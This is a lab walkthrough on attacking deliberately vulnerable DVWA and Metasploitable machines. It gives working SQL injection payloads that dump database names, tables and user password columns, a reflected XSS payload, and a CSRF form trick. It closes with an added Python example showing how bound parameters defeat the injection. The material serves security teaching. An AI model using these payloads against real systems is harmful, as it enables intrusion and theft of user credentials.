Example 1

Uploaded by

Levi
Copyright © All Rights Reserved

SQL Injection and scripting attack using DVWA and Metasploitable
Steps:
1. First, download Metasploitable to your VM from the following link:
https://information.rapid7.com/download-metasploitable-2017-thanks.html

It can be used as a server in your VM to practice your hacking skills.

2. Unzip the file. On the system where VMware is installed, open the following file; when asked which
application to open it with, choose VMware, and it will create a new machine.
3. Now power on Metasploitable. It will check some settings, and the following should be visible to you
at the end. You can now enter msfadmin as both the username and the password.

4. After logging in, you can get the IP address of the server with the ifconfig command, and the following
info should be shown. Note the inet address, which in my case is 192.168.24.130.

5. Now open this IP in your VM machine, which in my case is Kali Linux, and the Metasploitable page
should be visible to you. From there, click DVWA to go to the DVWA login page.
6. Log in using the default credentials, username: Admin and password: password. Then, under security,
you can set the security level anywhere from high to low; in our case we set it to low.
7. Now go to the SQL Injection tab and start the attack as follows.

If you write 1 in the text box, you will get the information for ID 1 stored in the database.

If you write 2 in the text box, you will get the information for ID 2 stored in the database.

If you write 1' in the text box, you will get an error.

If you write 1' or 1 = 1# in the text box, you will get the information for every ID stored in the database.

If you write 1' order by 3# in the text box, you will get an error.

If you write 1' order by 2# in the text box, it will show a result, as the query returns only 2 columns.

If you write %' or '0'='0 in the text box, it will show you all records in the database: the first condition is false for every record and the second is true for every record.

If you write %' or 0=0 union select null, version() # in the text box, it will show you the database version.

If you write %' or 0=0 union select null, user() # in the text box, it will show you the database username.

If you write %' or 0=0 union select null, database() # in the text box, it will show you the database name.

If you write %' and 1=0 union select null, table_name from information_schema.tables # in the text box,
it will show you all tables listed in the information schema.

If you write %' and 1=0 union select null, concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' # in the text box, it will show you all column
fields of the users table, read from the information schema.

If you write %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password)
from users # in the text box, it will show you the contents of those column fields from the users table.
8. Now we will try a cross-site scripting attack by going to the XSS reflected tab, as follows.

If you type <script>alert('XSS ATTACK (ANS TRUST)')</script>, it will display the following.

9. For CSRF on DVWA, go to the CSRF tab on the DVWA site and change the password.

10. Log out and log in with the new password.

11. Right-click on a blank space in the CSRF tab and click the view page source option.

12. Copy the selected form from the page source, paste it into Windows Notepad, and save the file as .html.

13. Now open the HTML file that you just saved in Notepad and make the following changes.

Make sure the IP you put in the file is the one given to you by Metasploitable.
14. Now open the file and this will be displayed to you. When you press Change you will be redirected to
DVWA, and when you enter your credentials it will show you login failed, as you got attacked.

15. Open Burp Suite and set up its proxy settings in Mozilla using the FoxyProxy extension. To see the
Burp proxy settings, go to the following.
16. Then put this information into the FoxyProxy extension.

17. Then switch to the Burp Suite proxy that you created and open the PortSwigger site to do the following
lab: https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data

18. Start by accessing the lab, and you will see in the Burp Suite HTTP history that it is recording the
websites that you are visiting or have visited.
19. Turn intercept on in Burp Suite and go to the gift section on the website. Burp Suite will open the
packet information; then make the following changes in category.
20. Then forward the packet; the following should be shown to you and the lab will be shown as solved.
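
Why the inputs in step 7 change the query, and how a bound parameter stops them, shown as an added example that is not part of the original document and not DVWA's own code; the same fix applies to the category parameter in the lab of steps 17 to 20. Assumptions: Python's sqlite3 stands in for DVWA's PHP/MySQL, the users rows and function names are constructed, and only the step 7 inputs that need no MySQL # comment are used, because SQLite does not treat # as a comment.

```python
import sqlite3

# Constructed sample rows; the table and names are assumptions, not DVWA's data.
ROWS = [(1, "Alice", "Adams"), (2, "Bob", "Baker"), (3, "Carol", "Clark")]
# Inputs taken from step 7 that need no MySQL '#' comment.
STEP7_INPUTS = ["1", "1'", "%' or '0'='0"]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY,"
               " first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return db


def lookup_concat(db, user_id):
    """Vulnerable pattern: the input is pasted into the SQL text."""
    sql = ("SELECT first_name, last_name FROM users"
           " WHERE user_id = '" + user_id + "'")
    try:
        return db.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return "error: " + str(exc)  # the unbalanced quote in 1' breaks parsing


def lookup_bound(db, user_id):
    """Hardened pattern: fixed SQL text, input bound as a value."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()


def lookup_strict(db, user_id):
    """Bound parameter plus an allow-list check: an ID is ASCII digits only."""
    if not (user_id.isascii() and user_id.isdigit()):
        return []
    return lookup_bound(db, int(user_id))


def compare(inputs):
    """Run each input through both patterns against a fresh database."""
    db = make_db()
    return {text: (lookup_concat(db, text), lookup_bound(db, text))
            for text in inputs}


if __name__ == "__main__":
    for text, (concat, bound) in compare(STEP7_INPUTS).items():
        print(f"{text!r:18} concat={concat!r} bound={bound!r}")
```

With the concatenated query the quote in the input ends the string literal early, so the rest of the input is parsed as SQL; with the bound parameter the whole input is compared as one value and matches no row.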
